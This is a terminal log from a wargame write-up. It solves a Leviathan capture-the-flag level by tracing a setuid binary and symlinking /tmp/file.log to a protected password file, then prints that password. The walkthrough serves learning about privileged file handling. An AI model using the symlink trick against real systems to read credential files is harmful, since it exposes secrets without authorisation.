leviathan5@leviathan:~$ ./leviathan5 
Cannot find /tmp/file.log
leviathan5@leviathan:~$ touch /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5 
leviathan5@leviathan:~$ cat /tmp/file.log
cat: /tmp/file.log: No such file or directory


The binary is looking for /tmp/file.log
After we create one, it seems to disappear. Race ?


leviathan5@leviathan:~$ touch /tmp/file.log && ltrace ./leviathan5 
__libc_start_main(0x80485db, 1, 0xffffd684, 0x80486a0 <unfinished ...>
fopen("/tmp/file.log", "r")                                                       = 0x804b008
fgetc(0x804b008)                                                                  = '\377'
feof(0x804b008)                                                                   = 1
fclose(0x804b008)                                                                 = 0
getuid()                                                                          = 12005
setuid(12005)                                                                     = 0
unlink("/tmp/file.log")                                                           = 0
+++ exited (status 0) +++

line 21. yup it gets deleted


leviathan5@leviathan:~$ ls
leviathan5
leviathan5@leviathan:~$ mkdir /tmp/bor
leviathan5@leviathan:~$ ln -s /etc/leviathan_pass/leviathan6 /mp^C
leviathan5@leviathan:~$ ./leviathan5 
Cannot find /tmp/file.log
leviathan5@leviathan:~$ n -s /etc/leviathan_pass/leviathan6 /tmp/file.log
-bash: n: command not found
leviathan5@leviathan:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5 
UgaoFee4li
leviathan5@leviathan:~$ 
